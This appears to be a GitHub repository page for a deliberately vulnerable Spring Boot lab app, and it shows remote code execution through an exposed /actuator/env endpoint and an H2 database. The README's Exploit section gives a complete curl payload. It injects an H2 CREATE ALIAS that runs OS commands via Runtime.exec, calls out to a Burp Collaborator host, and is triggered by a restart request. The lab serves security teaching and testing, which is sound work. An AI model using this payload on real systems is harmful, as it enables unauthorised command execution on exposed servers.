Skip to content
Sample Spring Boot App Demonstrating RCE via Exposed env Actuator and H2 Database
Java Dockerfile
Branch: master
Clone or download
Latest commit 56c4b95 Jan 13, 2020
Permalink
Type Name Latest commit message Commit time
Failed to load latest commit information.
src/main/java/hello First commit Jan 12, 2020
target First commit Jan 12, 2020
Dockerfile First commit Jan 12, 2020
README.md First commit Jan 12, 2020
application.properties First commit Jan 12, 2020
mvnw First commit Jan 12, 2020
mvnw.cmd First commit Jan 12, 2020
pom.xml First commit Jan 12, 2020

README.md

Spring Boot Actuator H2 RCE

Introduction

This is a sample app based off the default Spring Boot app in Spring's documentation that demonstrates how an attacker can achieve RCE on an instance with an exposed /actuator/env endpoint and a H2 database.

Usage

First, start the app. You can do this locally or with Docker.

Local

If you run this locally, you need JDK 1.8 or later and Maven 3.2+.

./mvnw package && java -jar target/gs-spring-boot-docker-0.1.0.jar

Docker

  1. sudo docker build -t spaceraccoon/spring-boot-rce-lab .
  2. sudo docker run -p 8080:8080 -t spaceraccoon/spring-boot-rce-lab

The app is now running on localhost:8080.

Exploit

  1. (Modify the curl request accordingly) curl -X 'POST' -H 'Content-Type: application/json' --data-binary $'{\"name\":\"spring.datasource.hikari.connection-test-query\",\"value\":\"CREATE ALIAS EXEC AS CONCAT(\'String shellexec(String cmd) throws java.io.IOException { java.util.Scanner s = new\',\' java.util.Scanner(Runtime.getRun\',\'time().exec(cmd).getInputStream()); if (s.hasNext()) {return s.next();} throw new IllegalArgumentException(); }\');CALL EXEC(\'curl http://x.burpcollaborator.net\');\"}' 'http://localhost:8080/actuator/env'
  2. curl -X 'POST' -H 'Content-Type: application/json' 'http://localhost:8080/actuator/restart'

You will receive a pingback.

You can’t perform that action at this time.